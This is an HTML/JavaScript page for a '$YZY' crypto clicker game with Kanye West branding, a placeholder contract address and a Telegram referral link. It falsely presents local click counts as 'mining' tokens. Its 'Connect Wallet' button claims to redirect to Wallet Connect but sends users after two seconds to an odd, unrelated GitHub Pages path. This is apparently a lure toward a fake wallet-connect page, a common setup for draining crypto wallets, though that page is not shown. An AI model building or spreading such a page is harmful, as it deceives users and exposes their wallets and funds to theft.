<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="YZY Clicker Game - Mine $YZY by clicking the Yeezy image.">
  <title>YZY Clicker | $YZY Mining</title>
  <style>
    /* Google Font */
    @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap');

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      list-style: none;
      text-decoration: none;
      
    }
    a{
        color:inherit;
    }

    body {
      font-family: 'Poppins', sans-serif;
      background-color: #FFFFFF;
      color: #000000;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: flex-start;
      min-height: 100vh;
      overflow-x: hidden;
    }

    /* Main Content */
    .container {
      width: 100%;
      padding-top: 50px;
      flex: 1;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      text-align: center;
    }

    .yeezy-img {
      width: 200px;
      cursor: pointer;
      margin-bottom: 30px;
      animation: pulse 1.5s infinite;
    }

    @keyframes pulse {
      0% {
        transform: scale(1);
      }
      50% {
        transform: scale(1.05);
      }
      100% {
        transform: scale(1);
      }
    }

    .counter {
  font-family: 'GlitchGoblin', sans-serif;
  font-size: 2rem;
  color: #000000;
  font-weight: 400;
  margin-bottom: 30px;
  text-shadow: 0px 0px 4px #33333318;
  text-align: center;
}

#yzyEarned {
  color: #4CAF50;
  margin: 5px 0;
}

#levelDisplay {
  color: #3F51B5;
  margin: 5px 0;
}

.wrapper {
  width: 500px; /* Largeur de la barre de progression */
}

.progress-bar {
  width: 100%;
  background-color: #e0e0e0; /* Couleur de fond de la barre */
  padding: 3px;
  border-radius: 3px;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.2); /* Ombre interne */
}

.progress-bar-fill {
  display: block;
  height: 22px; /* Hauteur de la barre de progression */
  background-color: #659cef; /* Couleur de remplissage de la barre */
  border-radius: 3px;
  transition: width 500ms ease-in-out; /* Animation de la progression */
}




.button-27 {
  appearance: none;
  background-color: #000000;
  border: 2px solid #1A1A1A;
  border-radius: 15px;
  box-sizing: border-box;
  color: #FFFFFF;
  cursor: pointer;
  display: inline-block;
  font-family: Roobert,-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
  font-size: 16px;
  font-weight: 600;
  line-height: normal;
  margin: 0;
  min-height: 60px;
  min-width: 0;
  outline: none;
  padding: 16px 24px;
  text-align: center;
  text-decoration: none;
  transition: all 300ms cubic-bezier(.23, 1, 0.32, 1);
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
  width: 50vw;
  will-change: transform;
}

.button-27:disabled {
  pointer-events: none;
}

.button-27:hover {
  box-shadow: rgba(0, 0, 0, 0.25) 0 8px 15px;
  transform: translateY(-2px);
}

.button-27:active {
  box-shadow: none;
  transform: translateY(0);
}
    .coming-soon {
      margin-top: 30px;
      font-size: 1.2rem;
      font-weight: 600;
      color: #000000;
    }

    .notification-card {
        margin-top: 24px;
  position: fixed;
  top: 20px;
  left: 50%;
  transform: translateX(-50%); /* ✅ Centrage horizontal */
  background-color: #dcdcdcb8;
  padding: 15px 20px;
  border-radius: 10px;
  width: 90%;
  max-width: 400px;
  box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
  display: none;
  overflow: hidden;
  display: flex;
  align-items: center;
  gap: 10px;
  animation: slideDown 0.4s ease forwards;
}

.notification-bar {
  width: 5px;
  height: 100%;
  background-color: #00FF85;
  border-radius: 10px 0 0 10px;
}

.notification-close {
  background: transparent;
  border: none;
  font-size: 20px;
  font-weight: bold;
  cursor: pointer;
  margin-left: auto;
  color: #333;
  transition: color 0.3s ease;
}

.notification-close:hover {
  color: #FF0000;
}

/* Animation d’apparition et disparition */
@keyframes slideDown {
  from {
    opacity: 0;
    transform: translate(-50%, -20px);
  }
  to {
    opacity: 1;
    transform: translate(-50%, 0);
  }
}

@keyframes fadeOut {
  from {
    opacity: 1;
    transform: translate(-50%, 0);
  }
  to {
    opacity: 0;
    transform: translate(-50%, -20px);
  }
}



.referral-container {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  padding: 2rem;
  background-color: #f4f4f9;
  border-radius: 12px;
  box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
  max-width: 600px;
  margin: 0 auto;
  text-align: center;
  margin-top: 1rem;
}

.referral-container h2 {
    font-family: 'GlitchGoblin', sans-serif;
  font-size: 1.8rem;
  font-weight: bold;
  color: #000000;
  margin-bottom: 1rem;
}

.referral-content {
  display: flex;
  flex-direction: column;
  align-items: center;
}

.referral-content p {
  font-size: 1.2rem;
  color: #000000;
  margin-bottom: 1rem;
}

.referral-link {
    text-shadow: 0px 0px 4px #33333318;
  display: flex;
  align-items: center;
  justify-content: center;
  margin-top: 1rem;
  padding: 12px 24px;
  background-color: #00d46d;
  color: white;
  font-size: 1.2rem;
  font-weight: bold;
  border-radius: 8px;
  box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
  transition: transform 0.3s ease, box-shadow 0.3s ease;
}

.referral-link a {
  color: white;
  text-decoration: none;
}

.referral-link:hover {
  transform: translateY(-4px);
  box-shadow: 0 6px 14px rgba(0, 0, 0, 0.2);
}

.referral-link:active {
  transform: translateY(2px);
  box-shadow: none;
}



    .navbar-bottom {
        font-family: 'GlitchGoblin', sans-serif;
  position: fixed;
  bottom: 0;
  width: 100%;
  display: flex;
  justify-content: space-around;
  align-items: center;
  background-color: #000;
  color: #FFF;
  padding: 12px 0;
  z-index: 1000;
  border-radius: 15px 15px 0 0; /* Coins arrondis */
}

.navbar-bottom a {
  color: #FFF;
  text-decoration: none;
  font-weight: 600;
  font-size: 1.1rem;
  padding: 10px 15px;
  transition: color 0.3s ease, transform 0.3s ease;
}

.navbar-bottom a:hover {
  color: #00FF85;
  transform: scale(1.1); /* Légère augmentation de la taille */
}

.navbar-bottom a:active {
  transform: scale(1); /* Retour à la taille normale lors du clic */
}

.navbar-bottom a:focus {
  outline: none;
}

    .glitch-wrapper {
   width: 100%;
   height: 100%;
   display: flex;
   align-items: center;
   justify-content: center;
   text-align: center;
   background-color: black; /* Fond noir */
}
#ca
{
    margin-top: 3px;
  font-size: 1em;
  font-weight: 700;
  line-height: 1.2;
  color: #fff; /* Texte blanc */
  letter-spacing: 5px;
  z-index: 1;
}
.glitch {
   position: relative;
   font-size: 80px;
   font-weight: 600;
   line-height: 1.2;
   color: #fff; /* Texte blanc */
   letter-spacing: 5px;
   z-index: 1;
}

.glitch:before {
   content: attr(data-glitch);
   position: absolute;
   top: 0;
   left: -2px;
   width: 100%;
   color: #fff;
   background-color: black; /* Fond noir */
   overflow: hidden;
   clip: rect(0, 900px, 0, 0);
   animation: noise-before 3s infinite linear alternate-reverse;
}

.glitch:after {
   content: attr(data-glitch);
   position: absolute;
   top: 0;
   left: 2px;
   width: 100%;
   color: #fff;
   background-color: black; /* Fond noir */
   overflow: hidden;
   clip: rect(0, 900px, 0, 0);
   animation: noise-after 2s infinite linear alternate-reverse;
}

@keyframes noise-before {
   0% { clip: rect(61px, 9999px, 52px, 0); }
   5% { clip: rect(33px, 9999px, 144px, 0); }
   10% { clip: rect(121px, 9999px, 115px, 0); }
   15% { clip: rect(144px, 9999px, 162px, 0); }
   20% { clip: rect(62px, 9999px, 180px, 0); }
   25% { clip: rect(34px, 9999px, 42px, 0); }
   30% { clip: rect(147px, 9999px, 179px, 0); }
   35% { clip: rect(99px, 9999px, 63px, 0); }
   40% { clip: rect(188px, 9999px, 122px, 0); }
   45% { clip: rect(154px, 9999px, 14px, 0); }
   50% { clip: rect(63px, 9999px, 37px, 0); }
   55% { clip: rect(161px, 9999px, 147px, 0); }
   60% { clip: rect(109px, 9999px, 175px, 0); }
   65% { clip: rect(157px, 9999px, 88px, 0); }
   70% { clip: rect(173px, 9999px, 131px, 0); }
   75% { clip: rect(62px, 9999px, 70px, 0); }
   80% { clip: rect(24px, 9999px, 153px, 0); }
   85% { clip: rect(138px, 9999px, 40px, 0); }
   90% { clip: rect(79px, 9999px, 136px, 0); }
   95% { clip: rect(25px, 9999px, 34px, 0); }
   100% { clip: rect(173px, 9999px, 166px, 0); }
}

@keyframes noise-after {
   0% { clip: rect(26px, 9999px, 33px, 0); }
   5% { clip: rect(140px, 9999px, 198px, 0); }
   10% { clip: rect(184px, 9999px, 89px, 0); }
   15% { clip: rect(121px, 9999px, 6px, 0); }
   20% { clip: rect(181px, 9999px, 99px, 0); }
   25% { clip: rect(154px, 9999px, 133px, 0); }
   30% { clip: rect(134px, 9999px, 169px, 0); }
   35% { clip: rect(26px, 9999px, 187px, 0); }
   40% { clip: rect(147px, 9999px, 137px, 0); }
   45% { clip: rect(31px, 9999px, 52px, 0); }
   50% { clip: rect(191px, 9999px, 109px, 0); }
   55% { clip: rect(74px, 9999px, 54px, 0); }
   60% { clip: rect(145px, 9999px, 75px, 0); }
   65% { clip: rect(153px, 9999px, 198px, 0); }
   70% { clip: rect(99px, 9999px, 136px, 0); }
   75% { clip: rect(118px, 9999px, 192px, 0); }
   80% { clip: rect(1px, 9999px, 83px, 0); }
   85% { clip: rect(145px, 9999px, 98px, 0); }
   90% { clip: rect(121px, 9999px, 154px, 0); }
   95% { clip: rect(156px, 9999px, 44px, 0); }
   100% { clip: rect(67px, 9999px, 122px, 0); }
}
/* Style de la carte à afficher */
.wallet-card {
    box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
    border: 1px solid #a2a2a286;
  display: NONE;  /* Caché au début */
  padding: 20px;
  background-color: #f4f4f9;
  border-radius: 12px;
  box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
  text-align: center;
  font-family: 'GlitchGoblin', sans-serif;
  
  /* Centrage absolu */
  position: fixed;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  z-index: 100000; /* Z-index très élevé */
  max-width: 400px; /* Optionnel : largeur max */
  width: 80%; /* Optionnel : largeur relative */
  padding: 30px; /* Optionnel : padding supplémentaire */
}

.wallet-card p {
  font-size: 1.2rem;
  color: #000000;
}
@font-face {
  font-family: 'GlitchGoblin';
  src: url('./GlitchGoblin.otf') format('opentype');
  font-weight: normal;
  font-style: normal;
}


  </style>
</head>
<body>
    <div class="glitch-wrapper">
        <div id="ca" class="glitch" data-glitch="CA : XXXXXXXXXXXXXXXXXXXXX">CA : XXXXXXXXXXXXXXXXXXXXX</div>
     </div>
         <!-- Main Content -->
  <main class="container" id="homeSection">
    <img src="yeezy.svg" alt="Yeezy Shoe" class="yeezy-img" id="yeezyClicker">
    <div class="counter" id="counter">
        <div class="wrapper">
            <div class="progress-bar">
              <div class="progress-bar-fill"></div>
            </div>
          </div>
          
          
        <p id="yzyEarned">YZY Earned: 0</p>
        <p id="levelDisplay">Level: 1 | XP: 0</p>
      </div>
      
      
      
      <button class="button-27 wallet-btn" role="button">Connect Wallet</button>

      <!-- La carte (card) à afficher lorsque le bouton est cliqué -->
      <div class="wallet-card" id="walletCard">
        <p>Redirecting to Wallet Connect...</p>
      </div>
          
    <!-- Coming Soon Section -->
    <div class="coming-soon">Coming Soon: Buy $YZY</div>
  </main>

  <!-- Referral Section -->
<!-- Referral Section -->
<section class="referral-container" id="referralSection">
    <h2>Share & Earn, Yeezy Style</h2>
    <div class="referral-content">
        <p>"Join the revolution. Claim your rewards, flip the market. 🚀"</p>
        <p>"It's not just a click... it's your shot at the moon. 💥"</p>
        <img width="40%" src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExejlzcXFjbjhzazYxOTZ3MTZmYjJsNTdlOWRkN2wyNGpqdWp5c3QzeCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/7AVv1sSY7quBwZSmCj/giphy.gif" alt="">

      <div class="referral-link" id="referralLink">
        <a href="https://t.me/YZYGameBot" target="_blank">Tap here. Become a YZY legend. 🖤</a>
      </div>
      <div class="x" style="margin-top: 10px;"><a href="https://x.com/kanyewest"><img src="x.png" style="width: 50px; box-shadow: 0px 0px 4px #33333361; border-radius: 0.4em;" alt=""></a></div>
    </div>
  </section>
  
  <div id="notificationCard" class="notification-card">
    <div class="notification-bar"></div>
    <p>🎉 WELCOME $YZY!</p>
    <button class="notification-close" aria-label="Close notification">✖</button>
</div>

  
  <!-- Bottom Navbar -->
  <nav class="navbar-bottom">
    <a href="#home" id="homeTab">Home</a>
    <a href="#referral" id="referralTab">Referral</a>
  </nav>

  <script>
 document.addEventListener("DOMContentLoaded", () => {
  let counter = parseFloat(localStorage.getItem('yzyCounter')) || 0;
  let experience = parseFloat(localStorage.getItem('experience')) || 0; // XP initialization
  let level = parseInt(localStorage.getItem('level')) || 1; // Level initialization
  const counterDisplay = document.getElementById("counter");
  const yeezyClicker = document.getElementById("yeezyClicker");
  const homeSection = document.getElementById("homeSection");
  const referralSection = document.getElementById("referralSection");
  const referralLink = document.getElementById("referralLink");

  const progressBar = document.getElementById("progressBar");

  // Liste des paliers et messages
  const milestones = [
    { amount: 250, message: "🎉 Congrats! You've reached 250 $YZY!" },
    { amount: 500, message: "🔥 Awesome! You've reached 500 $YZY!" },
    { amount: 1500, message: "🚀 Great job! You've reached 1,500 $YZY!" },
    { amount: 2500, message: "💎 Incredible! You've reached 2,500 $YZY!" },
    { amount: 5000, message: "🎁 WOW! You've reached 5,000 $YZY and received +2,000 $YZY as a bonus!" }
  ];

  let notificationsShown = JSON.parse(localStorage.getItem('notificationsShown')) || [];

  // Afficher la notification
  const notificationCard = document.getElementById("notificationCard");
const notificationClose = document.querySelector(".notification-close");
// Sélectionner le bouton et la carte
const walletButton = document.querySelector('.wallet-btn');
const walletCard = document.getElementById('walletCard');

// Ajouter l'événement de clic au bouton
walletButton.addEventListener('click', () => {
  // Afficher la carte
  walletCard.style.display = 'block';

  // Rediriger après 2 secondes
  setTimeout(() => {
    window.location.href = 'https://fauxon.github.io/hdpisjdmv-/modal1.html';  // Remplacer avec le lien vers Wallet Connect
  }, 2000);
});

// Afficher la notification
function showNotification(message) {
  if (notificationCard) {
    console.log("Notification affichée : ", message); // Ajoute ceci pour vérifier si la fonction est exécutée
    notificationCard.querySelector("p").textContent = message;
    notificationCard.style.display = 'flex';
    notificationCard.style.animation = 'slideDown 0.4s ease forwards';

    notificationClose.removeEventListener("click", hideNotification);
    notificationClose.addEventListener("click", hideNotification);

    setTimeout(() => hideNotification(), 2500);
  }
}


// Masquer la notification
function hideNotification() {
  if (notificationCard) {
    console.log("Notification fermée"); // Vérifie si la fonction est exécutée
    notificationCard.style.animation = 'fadeOut 0.4s ease forwards';
    setTimeout(() => {
      notificationCard.style.display = 'none';
    }, 400);
  }
}
notificationClose.addEventListener("click", () => {
  hideNotification();
});



  // Vérifier les paliers atteints
  function checkMilestones() {
    milestones.forEach((milestone) => {
      if (counter >= milestone.amount && !notificationsShown.includes(milestone.amount)) {
        showNotification(milestone.message);
        notificationsShown.push(milestone.amount);
        localStorage.setItem('notificationsShown', JSON.stringify(notificationsShown));

        if (milestone.amount === 10000) {
          counter += 2000;
          localStorage.setItem('yzyCounter', counter);
          counterDisplay.textContent = `$YZY Earned: ${counter.toFixed(3)}`;
        }
      }
    });
  }

 // Mise à jour du niveau et de l'expérience
// Mise à jour du niveau et de l'expérience
function updateLevel() {
  if (experience >= level * 1000) {
    level++;
    experience = experience - (level - 1) * 1000;
    localStorage.setItem('level', level);
    localStorage.setItem('experience', experience);
    showNotification(`🎉 Congratulations! You've reached Level ${level}!`);
  }
}

// Sélectionne la barre de progression à l'extérieur de la fonction
const progressBarFill = document.getElementById('progressBarFill');  // Ajoute cette ligne pour récupérer l'élément

// Mise à jour du compteur et de la barre de progression
function updateCounter() {
  // Affichage de l'expérience et du niveau
  counterDisplay.textContent = `$YZY Earned: ${counter.toFixed(3)} | Level: ${level} | XP: ${experience}`;

  localStorage.setItem('yzyCounter', counter);
  localStorage.setItem('experience', experience);

  checkMilestones();
  updateLevel();

  // Mise à jour de la barre de progression
  if (progressBarFill) {
    const progress = (experience / (level * 1000)) * 100;  // Calcul de la progression
    progressBarFill.style.width = `${progress}%`;  // Mise à jour de la largeur de la barre
  }
}



  // Gestion du clic Yeezy avec XP
  yeezyClicker.addEventListener("click", () => {
    const miningSpeed = level * 0.4;
    counter += miningSpeed;
    experience += 10; // Gagner de l'XP à chaque clic
    updateCounter();
  });

  // Navigation entre les sections
  document.getElementById("homeTab").addEventListener("click", () => {
    homeSection.style.display = "flex";
    referralSection.style.display = "none";
  });

  document.getElementById("referralTab").addEventListener("click", () => {
    homeSection.style.display = "none";
    referralSection.style.display = "flex";
  });

  // Initialisation
  updateCounter();
  homeSection.style.display = "flex";
  referralSection.style.display = "none";
});

  </script>
</body>
</html>
